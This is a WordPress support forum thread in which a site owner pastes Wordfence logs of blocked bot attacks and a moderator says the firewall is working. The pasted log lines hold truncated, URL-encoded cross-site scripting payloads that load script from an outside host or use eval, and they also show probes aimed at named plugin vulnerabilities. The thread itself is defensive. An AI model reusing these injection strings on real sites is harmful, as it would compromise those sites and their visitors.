Title: vulnerable Last modified: May 4, 2020 --- # vulnerable * [gina723](https://wordpress.org/support/users/gina723/) * (@gina723) * [6 years ago](https://wordpress.org/support/topic/vulnerable-4/) * the following are hackers favourite tools of wordpress to hack my site. I do everything i can to keep these buzzards out. I’m afraid one day Wordfence will not be able to stop them… can these access points be removed or besides paying the premium for wordfence (i cannot possibly afford) is there something i can do to stop these or is this something I shouldn’t worry about? These are just a few of what has been blocked. * also, what do they want with my website? it’s still under construction… * these are just a few, i’m sure you know that… * ``` Germany was blocked by firewall for WAF-RULE-194 at https://--.com/wp-admin/admin-ajax.php?action=getJSONExportTable&tables%5B0%5D=8&reqType=ajax&m… 5/3/2020 5:39:04 AM (1 day 3 hours ago) IP: 87.106.53.41 Hostname: www.voipfactory.de Human/Bot: Bot Germany was blocked by firewall for Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update in query string: yp_remote_get=2 at https://--.com/wp-admin/admin-post.php?yp_remote_get=2 5/3/2020 5:38:50 AM (1 day 3 hours ago) IP: 87.106.53.41 Hostname: www.voipfactory.de Human/Bot: Bot Germany was blocked by firewall for Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update in query string: yp_remote_get=1 at https://--.com/wp-admin/admin-post.php?yp_remote_get=1 5/3/2020 5:38:45 AM (1 day 3 hours ago) IP: 87.106.53.41 Hostname: www.voipfactory.de Human/Bot: Bot Germany was blocked by firewall for Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update in query string: yp_remote_get=test at https://--.com/wp-admin/admin-post.php?yp_remote_get=test 5/3/2020 5:38:26 AM (1 day 3 hours ago) IP: 87.106.53.41 Hostname: www.voipfactory.de Human/Bot: Bot Germany was blocked by firewall for WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting at https://--.com/wp-admin/admin-ajax.php 5/3/2020 5:37:48 AM (1 day 3 hours ago) IP: 87.106.53.41 Hostname: www.voipfactory.de Human/Bot: Bot Germany was blocked by firewall for XSS: Cross Site Scripting in POST body: cron_code=%22%3E%3Cscript%20src%3D'https%3A%2F%2Fcount.trackstatisticsss.com%2Fstm%3F%26v13'%20type%3Dtext%2Fj… at https://--.com/wp-admin/admin-post.php 5/3/2020 5:37:43 AM (1 day 3 hours ago) IP: 87.106.53.41 Hostname: www.voipfactory.de Human/Bot: Bot Germany was blocked by firewall for WAF-RULE-170 at https://--.com/wp-admin/admin-post.php?page=fp_admin_options_page 5/3/2020 5:36:49 AM (1 day 3 hours ago) IP: 87.106.53.41 Hostname: www.voipfactory.de Human/Bot: Bot Germany was blocked by firewall for XSS: Cross Site Scripting in POST body: licenseEmail=%22%3E%3Cscript%20type%3D'text%2Fjavascript'%20src%3D'https%3A%2F%2Fcount.trackstatisticsss.com%2Fst… at https://--.com/wp-admin/admin-ajax.php 5/3/2020 5:34:45 AM (1 day 3 hours ago) IP: 87.106.53.41 Hostname: www.voipfactory.de Human/Bot: Human /5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Germany was blocked by firewall for XSS: Cross Site Scripting in POST body: gapi_client_id=%22%3E%3Cscript%20type%3Dtext%2Fjavascript%20src%3D'https%3A%2F%2Fcount.trackstatisticsss.com%2Fstm%… at https://--.com/wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_f… 5/3/2020 5:32:53 AM (1 day 3 hours ago) IP: 87.106.53.41 Hostname: www.voipfactory.de Human/Bot: Human Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36 Germany was blocked by firewall for XSS: Cross Site Scripting in POST body: css=%3C%2Fstyle%3E%3Cscript%20%20type%3Dtext%2Fjavascript%20language%3Djavascript%3Eeval(String.fromChar… at https://--.com/wp-admin/admin-ajax.php?action=bt_bb_set_custom_css 5/3/2020 5:32:43 AM (1 day 3 hours ago) IP: 87.106.53.41 Hostname: www.voipfactory.de Human/Bot: Bot Germany was blocked by firewall for WAF-RULE-213 at https://--.com/wp-admin/admin-ajax.php 5/3/2020 5:32:19 AM (1 day 3 hours ago) IP: 87.106.53.41 Hostname: www.voipfactory.de Human/Bot: Bot ``` - This topic was modified 6 years ago by [gina723](https://wordpress.org/support/users/gina723/). - This topic was modified 6 years ago by [Steven Stern (sterndata)](https://wordpress.org/support/users/sterndata/). - This topic was modified 6 years ago by [Jan Dembowski](https://wordpress.org/support/users/jdembowski/). Reason: Moved to Fixing WordPress, this is not an Everything else WordPress topic Viewing 1 replies (of 1 total) * Moderator [Steven Stern (sterndata)](https://wordpress.org/support/users/sterndata/) * (@sterndata) * Volunteer Forum Moderator * [6 years ago](https://wordpress.org/support/topic/vulnerable-4/#post-12778248) * WordFence is doing what it’s supposed to be doing. These are bots banging away at any websites they find. WordFence is stopping them. Let WordFence do its work. Viewing 1 replies (of 1 total) The topic ‘vulnerable’ is closed to new replies. ## Tags * [admin-ajax.php](https://wordpress.org/support/topic-tag/admin-ajax-php/) * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/) * 1 reply * 2 participants * Last reply from: [Steven Stern (sterndata)](https://wordpress.org/support/users/sterndata/) * Last activity: [6 years ago](https://wordpress.org/support/topic/vulnerable-4/#post-12778248) * Status: not resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics